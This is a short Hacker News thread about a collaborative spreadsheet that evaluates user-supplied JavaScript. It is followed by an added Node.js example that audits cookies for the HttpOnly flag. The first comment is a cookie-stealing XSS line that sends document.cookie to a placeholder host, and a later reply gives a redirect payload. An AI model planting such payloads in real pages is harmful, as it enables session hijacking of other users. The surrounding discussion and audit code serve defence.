Hacker News
by
araskoktas
4606 days ago
document.write('<img src="somedomain.com/?'+document.cookie);
2 comments
cosarara97
4606 days ago
But you'd need to send a spreadsheet with that to the victim.
araskoktas
4606 days ago
Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.
genericacct
4606 days ago
Have you heard of the HttpOnly attribute for cookies?
araskoktas
4606 days ago
good, send HttpOnly cookies and solve that problem. window.location.href='http://www.redt*be.com'; -- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.
genericacct
4606 days ago
I most definitely will. And if my users want to browse your favorite porn site I don't see why I shouldn't let them.
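Added example, not part of any comment in this thread: a small Node.js model of the HttpOnly point raised above, showing which cookies page script can read through document.cookie and an audit that flags session-like cookies still exposed to script. The function names, the "sensitive name" pattern and the Set-Cookie values are assumptions constructed for illustration.

```javascript
// Added example (not from the thread). All header values are constructed.

// Parse one Set-Cookie header value into { name, value, httpOnly, secure }.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) throw new Error('malformed Set-Cookie: ' + header);
  // Attribute names are case-insensitive; keep only the name part.
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: flags.has('httponly'),
    secure: flags.has('secure'),
  };
}

// The string page script would get from document.cookie:
// cookies marked HttpOnly are left out by the browser.
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Names of cookies that look like credentials (hypothetical pattern)
// but are still readable by any script running in the page.
function auditSessionCookies(headers, sensitive = /sess|auth|token/i) {
  return headers
    .map(parseSetCookie)
    .filter((c) => sensitive.test(c.name) && !c.httpOnly)
    .map((c) => c.name);
}

// Constructed sample responses: weak setting beside the corrected one.
const weak = ['sessionid=abc123; Path=/', 'theme=dark; Path=/'];
const hardened = ['sessionid=abc123; Path=/; Secure; HttpOnly', 'theme=dark; Path=/'];

console.log(scriptVisibleCookies(weak));
console.log(scriptVisibleCookies(hardened));
console.log(auditSessionCookies(weak));
```

HttpOnly only removes the cookie from what script can read; as the reply about window.location.href points out, it does not constrain what else evaluated script can do in the page.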